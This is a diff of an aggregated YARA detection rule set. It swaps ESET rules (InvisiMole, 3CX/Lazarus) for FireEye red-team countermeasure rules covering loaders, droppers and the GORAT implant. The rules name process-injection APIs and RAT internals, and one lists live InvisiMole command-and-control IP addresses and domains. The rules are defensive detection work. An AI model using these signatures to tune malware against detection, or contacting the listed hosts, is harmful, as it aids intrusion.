+		$check_magic_old_64 = {3? 64 FF D0 DE}
+		$check_magic_new_32 = {81 3? 86 DA 11 CE}
+		$check_magic_new_64 = {81 3? 64 DA 11 CE}
 
 	condition:
-		ESET_Potaodecoy_PRIVATE or ESET_Potaodll_PRIVATE or ESET_Potaousb_PRIVATE or ESET_Potaosecondstage_PRIVATE
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and ( any of ( $check_magic* ) ) and ( 2 of ( $s* ) )
 }
-
-rule ESET_Richheaders_Lazarus_Nukesped_Iconicpayloads_3CX_Q12023
+rule ESET_Apt_Windows_Invisimole_C2 : FILE
 {
 	meta:
-		description = "Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12"
+		description = "InvisiMole C&C servers"
 		author = "ESET Research"
-		id = "5c815d14-8a3e-5c6a-9dc3-988e0f31c094"
-		date = "2023-03-31"
-		modified = "2023-04-19"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/nukesped_lazarus/rich_headers_IconicPayloads_3CX.yar#L6-L23"
+		id = "9279c8cd-2c16-5f90-a7f5-e668d57c805b"
+		date = "2021-05-17"
+		modified = "2021-05-17"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L257-L297"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "3b88cda62cdd918b62ef5aa8c5a73a46f176d18b"
-		hash = "cad1120d91b812acafef7175f949dd1b09c6c21a"
-		hash = "5b03294b72c0caa5fb20e7817002c600645eb475"
-		hash = "7491bd61ed15298ce5ee5ffd01c8c82a2cdb40ec"
-		logic_hash = "f11a1db798bfcc534982bdf6afaae154b095b6a1e0896e75e2791c01e51a1c16"
+		logic_hash = "aff8456ce7a9ebe875c02e51c09b77ee7b1fddfc11d4ad236e12c8c5240a01a8"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 78
+		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$s1 = "46.165.220.228" ascii wide
+		$s2 = "80.255.3.66" ascii wide
+		$s3 = "85.17.26.174" ascii wide
+		$s4 = "185.193.38.55" ascii wide
+		$s5 = "194.187.249.157" ascii wide
+		$s6 = "195.154.255.211" ascii wide
+		$s7 = "153.re" ascii wide fullword
+		$s8 = "adstat.red" ascii wide
+		$s9 = "adtrax.net" ascii wide
+		$s10 = "akamai.sytes.net" ascii wide
+		$s11 = "amz-eu401.com" ascii wide
+		$s12 = "blabla234342.sytes.net" ascii wide
+		$s13 = "mx1.be" ascii wide fullword
+		$s14 = "statad.de" ascii wide
+		$s15 = "time.servehttp.com" ascii wide
+		$s16 = "upd.re" ascii wide fullword
+		$s17 = "update.xn--6frz82g" ascii wide
+		$s18 = "updatecloud.sytes.net" ascii wide
+		$s19 = "updchecking.sytes.net" ascii wide
+		$s20 = "wlsts.net" ascii wide
+		$s21 = "ro2.host" ascii wide fullword
+		$s22 = "2ld.xyz" ascii wide fullword
+		$s23 = "the-haba.com" ascii wide
+		$s24 = "82.202.172.134" ascii wide
+		$s25 = "update.xn--6frz82g" ascii wide
 
 	condition:
-		pe.rich_signature.toolid( 259 , 30818 ) == 9 and pe.rich_signature.toolid ( 256 , 31329 ) == 1 and pe.rich_signature.toolid ( 261 , 30818 ) >= 30 and pe.rich_signature.toolid ( 261 , 30818 ) <= 38 and pe.rich_signature.toolid ( 261 , 29395 ) >= 134 and pe.rich_signature.toolid ( 261 , 29395 ) <= 164 and pe.rich_signature.toolid ( 257 , 29395 ) >= 6 and pe.rich_signature.toolid ( 257 , 29395 ) <= 14
+		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $s21 and any of them
 }
 /*
  * YARA Rule Set
  * Repository Name: FireEye-RT
  * Repository: https://github.com/mandiant/red_team_tool_countermeasures/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 3561b71724dbfa3e2bb78106aaa2d7f8b892c43b
  * Number of Rules: 166
  * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance)
@@ -74084,4169 +74031,4003 @@ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
  */
-rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_2 : FILE
-{
-	meta:
-		description = "No description has been set in the source file - FireEye-RT"
-		author = "FireEye"
-		id = "3befb3f2-81d1-5db2-84d9-773158b9837c"
-		date = "2020-12-03"
-		date = "2020-12-03"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_2.yar#L4-L22"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
-		logic_hash = "0467532d643cf0200c6561b0724c884230892bf59db163c311b7d4f8acbb63d6"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 1
-
-	strings:
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
-		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
-		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
-}
-rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_JUSTASK_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'justask' project."
 		author = "FireEye"
-		id = "1b5f1f39-9fa2-5940-8da3-03808e4b7a5d"
-		date = "2020-12-03"
-		date = "2020-12-03"
+		id = "06a03d82-db69-5b5a-a578-a8053814e917"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/JUSTASK/production/yara/APT_HackTool_MSIL_JUSTASK_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
-		logic_hash = "f2244c6761639c1162a77a5e82296903c3cc21fbf46d262c779c5e4d6a2ef937"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "24d2f8e3838c4f02cd80644a396ce7cf105761d2feba54e39973564ca5e97571"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
-		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
+		$typelibguid0 = "aa59be52-7845-4fed-9ea5-1ea49085d67a" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Wmispy_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIspy' project."
 		author = "FireEye"
-		id = "1a3f4247-25f4-51ca-b881-209c0753b915"
-		date = "2020-12-03"
-		date = "2020-12-03"
+		id = "ac394751-da40-564b-8e24-8f353326b46a"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/HackTool_MSIL_WMIspy_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
-		logic_hash = "f020efff58c8b7761d700c662c422a9e1ffdf8fe5f6648e421b7c257e3b8d078"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "a5a9f7c7a7bfe474e8b21306ea220b4d476832f3ad4fafdd8967a2250d15a701"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
-		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
+		$typelibguid0 = "5ee2bca3-01ad-489b-ab1b-bda7962e06bb" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Loader_MSIL_Trimbishop_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_WMISPY_2 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the string 'msg' more than 60 times as well as numerous function names unique to or used by the TrimBishop tool. All strings found in RuralBishop are reversed in TrimBishop and stored in a variable with the format 'msg##'. With the exception of 'msg', 'DTrim', and 'ReverseString' the other strings referenced in this rule may be shared with RuralBishop."
+		description = "wql searches"
 		author = "FireEye"
-		id = "4d58f0a2-bf16-584c-8e92-c8ef54427767"
+		id = "474af878-a657-54bc-a063-04532df928d4"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_TrimBishop_1.yar#L4-L26"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "09bdbad8358b04994e2c04bb26a160ef"
-		logic_hash = "018e87542301db22c384fda2709e8d49711c0fa041d1ef591f98ee7a70dbb677"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		rev = 3
-
-	strings:
-		$msg = "msg" ascii wide
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "RuralBishop" ascii wide
-		$str2 = "KnightKingside" ascii wide
-		$str3 = "ReadShellcode" ascii wide
-		$str4 = "ReverseString" ascii wide
-		$str5 = "DTrim" ascii wide
-		$str6 = "QueensGambit" ascii wide
-		$str7 = "Messages" ascii wide
-		$str8 = "NtQueueApcThread" ascii wide
-		$str9 = "NtAlertResumeThread" ascii wide
-		$str10 = "NtQueryInformationThread" ascii wide
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and #msg > 60 and all of ( $str* )
-}
-rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_2 : FILE
-{
-	meta:
-		description = "No description has been set in the source file - FireEye-RT"
-		author = "FireEye"
-		id = "90ee2569-2e68-517b-b2d7-8c4015d92683"
-		date = "2020-12-03"
-		date = "2020-12-03"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_2.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/APT_HackTool_MSIL_WMISPY_2.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "c0598321d4ad4cf1219cc4f84bad4094"
-		logic_hash = "4cccfca0c06954105f762066741b6c35599a6c28df8b7c255a2659059169578f"
+		hash = "3651f252d53d2f46040652788499d65a"
+		logic_hash = "553fc1e536482a56b3228a5c9ebac843af9083e8ac864bf65c81b36a39ca5e5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
-		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
-		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
+		$MSIL = "_CorExeMain"
+		$str1 = "root\\cimv2" wide
+		$str2 = "root\\standardcimv2" wide
+		$str3 = "from MSFT_NetNeighbor" wide
+		$str4 = "from Win32_NetworkLoginProfile" wide
+		$str5 = "from Win32_IP4RouteTable" wide
+		$str6 = "from Win32_DCOMApplication" wide
+		$str7 = "from Win32_SystemDriver" wide
+		$str8 = "from Win32_Share" wide
+		$str9 = "from Win32_Process" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of ( $str* )
 }
-rule FIREEYE_RT_Loader_MSIL_Ruralbishop_3 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_PXELOOT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public RuralBishop project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the PXE And Loot project."
 		author = "FireEye"
-		id = "55a060ef-74e2-50d9-9090-558aaa04d97d"
-		date = "2020-12-09"
+		id = "5a72a6ff-bae4-57f5-a19b-a4595ac57293"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_RuralBishop_3.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PXELOOT/production/yara/HackTool_MSIL_PXELOOT_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "09bdbad8358b04994e2c04bb26a160ef"
-		logic_hash = "a4c55dede432c249e36e96ca09555448b0343969d389bfdb4bd459fe34e05ea1"
+		hash = "82e33011ac34adfcced6cddc8ea56a81"
+		logic_hash = "c9892adcb9ff5471235e45988f6662d3b8f984fdafca7024a5781eed50f6c0b3"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 7
 
 	strings:
-		$typelibguid1 = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii nocase wide
+		$typelibguid1 = "78B2197B-2E56-425A-9585-56EDC2C797D6" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Dropper_HTA_Wildchild_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_3 : FILE
 {
 	meta:
-		description = "This rule looks for strings present in unobfuscated HTAs generated by the WildChild builder."
+		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
 		author = "FireEye"
-		id = "f570baa5-7d58-5a0a-b713-769e62076f76"
+		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Dropper_HTA_WildChild_1.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_3.yar#L4-L39"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3e61ca5057633459e96897f79970a46d"
-		logic_hash = "60c1d53b8a43b9b7518f3260a4d61c6806641ee894a2a331a3a0a2ea0aff9d99"
+		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
+		logic_hash = "592745e9c67f7adf0cd48975ed1497211d8efeff29b52be1e2d082b9a648bb57"
 		score = 75
-		quality = 75
+		quality = 28
 		tags = "FILE"
 		rev = 5
 
 	strings:
-		$s1 = "processpath" ascii wide
-		$s2 = "v4.0.30319" ascii wide
-		$s3 = "v2.0.50727" ascii wide
-		$s4 = "COMPLUS_Version" ascii wide
-		$s5 = "FromBase64Transform" ascii wide
-		$s6 = "MemoryStream" ascii wide
-		$s7 = "entry_class" ascii wide
-		$s8 = "DynamicInvoke" ascii wide
-		$s9 = "Sendoff" ascii wide
-		$script_header = "<script language=" ascii wide
-
-	condition:
-		$script_header at 0 and all of ( $s* )
-}
-rule FIREEYE_RT_Loader_MSIL_Wildchild_1 : FILE
-{
-	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the WildChild project."
-		author = "FireEye"
-		id = "350dd658-46c9-573b-b532-07e4b437ba8d"
-		date = "2020-12-08"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Loader_MSIL_WildChild_1.yar#L4-L15"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7e6bc0ed11c2532b2ae7060327457812"
-		logic_hash = "e4320e33770613542182518ec787e4ccbb32f83c8afca5ec957d4846e6f4eb04"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		rev = 4
-
-	strings:
-		$typelibguid1 = "2e71d5ff-ece4-4006-9e98-37bb724a7780" ascii nocase wide
+		$dirty1 = "fireeye" ascii nocase wide
+		$dirty2 = "kulinacs" ascii nocase wide
+		$dirty3 = "RedFlare" ascii nocase wide
+		$dirty4 = "gorat" ascii nocase wide
+		$dirty5 = "flare" ascii nocase wide
+		$go1 = "go.buildid" ascii wide
+		$go2 = "Go build ID:" ascii wide
+		$json1 = "json:\"pid\"" ascii wide
+		$json2 = "json:\"key\"" ascii wide
+		$json3 = "json:\"agent_time\"" ascii wide
+		$json4 = "json:\"rid\"" ascii wide
+		$json5 = "json:\"ports\"" ascii wide
+		$json6 = "json:\"agent_platform\"" ascii wide
+		$rat = "rat" ascii wide
+		$str1 = "handleCommand" ascii wide
+		$str2 = "sendBeacon" ascii wide
+		$str3 = "rat.AgentVersion" ascii wide
+		$str4 = "rat.Core" ascii wide
+		$str5 = "rat/log" ascii wide
+		$str6 = "rat/comms" ascii wide
+		$str7 = "rat/modules" ascii wide
+		$str8 = "murica" ascii wide
+		$str9 = "master secret" ascii wide
+		$str10 = "TaskID" ascii wide
+		$str11 = "rat.New" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
 }
-rule FIREEYE_RT_APT_Loader_MSIL_WILDCHILD_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_GORAT_5 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b9e0707e-98eb-55da-ad1d-6a84bd113747"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "73102bd2-7b94-5c7b-b9a4-cfc9cf5e3212"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/APT_Loader_MSIL_WILDCHILD_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_5.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6f04a93753ae3ae043203437832363c4"
-		logic_hash = "a600c3d127f77dc1f99160e4a242e005970de0abd1798296b6a351b968ca1350"
+		hash = "cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f"
+		logic_hash = "67f85fb3bedfd18a1226c92318f387be3c7ff9566ca2d554c49cf62389482552"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "\x00QueueUserAPC\x00"
-		$s2 = "\x00WriteProcessMemory\x00"
-		$sb1 = { 6F [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 13 ?? 28 [2] 00 0A 28 [2] 00 0A 13 ?? 11 ?? 11 ?? 28 [2] 00 0A [0-16] 7B [2] 00 04 1? 20 [4] 28 [2] 00 0A 11 ?? 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 [0-16] 14 7E [2] 00 0A 7E [2] 00 0A 1? 20 04 00 08 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 [0-16] 7B [2] 00 04 7E [2] 00 0A [0-16] 8E ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 [4-120] 28 [2] 00 06 [0-80] 6F [2] 00 0A 6F [2] 00 0A 28 [2] 00 06 13 ?? 11 ?? 11 ?? 7E [2] 00 0A 28 [2] 00 06 }
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
-}
-rule FIREEYE_RT_Trojan_Macro_RESUMEPLEASE_1
-{
-	meta:
-		description = "No description has been set in the source file - FireEye-RT"
-		author = "FireEye"
-		id = "068662f6-28b8-5538-8bc3-6506565305ae"
-		date = "2020-12-01"
-		date = "2020-12-01"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RESUMEPLEASE/production/yara/Trojan_Macro_RESUMEPLEASE_1.yar#L4-L21"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "d5d3d23c8573d999f1c48d3e211b1066"
-		logic_hash = "040457bc446e496431129ff4623ddda5d9c2ce339ba65a7fbe42114626f36c60"
-		score = 75
-		quality = 75
-		tags = ""
-		rev = 1
-
-	strings:
-		$str00 = "For Binary As"
-		$str01 = "Range.Text"
-		$str02 = "Environ("
-		$str03 = "CByte("
-		$str04 = ".SpawnInstance_"
-		$str05 = ".Create("
+		$1 = "comms.BeaconData" fullword
+		$2 = "comms.CommandResponse" fullword
+		$3 = "rat.BaseChannel" fullword
+		$4 = "rat.Config" fullword
+		$5 = "rat.Core" fullword
+		$6 = "platforms.AgentPlatform" fullword
+		$7 = "GetHostID" fullword
+		$8 = "/rat/cmd/gorat_shared/dllmain.go" fullword
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Netshshellcoderunner_1 : FILE
+rule FIREEYE_RT_Trojan_MSIL_GORAT_Module_Powershell_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NetshShellCodeRunner' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Module - PowerShell' project."
 		author = "FireEye"
-		id = "b3521812-7ea3-5f80-89bd-3bdd71b687f2"
+		id = "b0fba130-9cd9-5b7f-a806-9ff8099f5731"
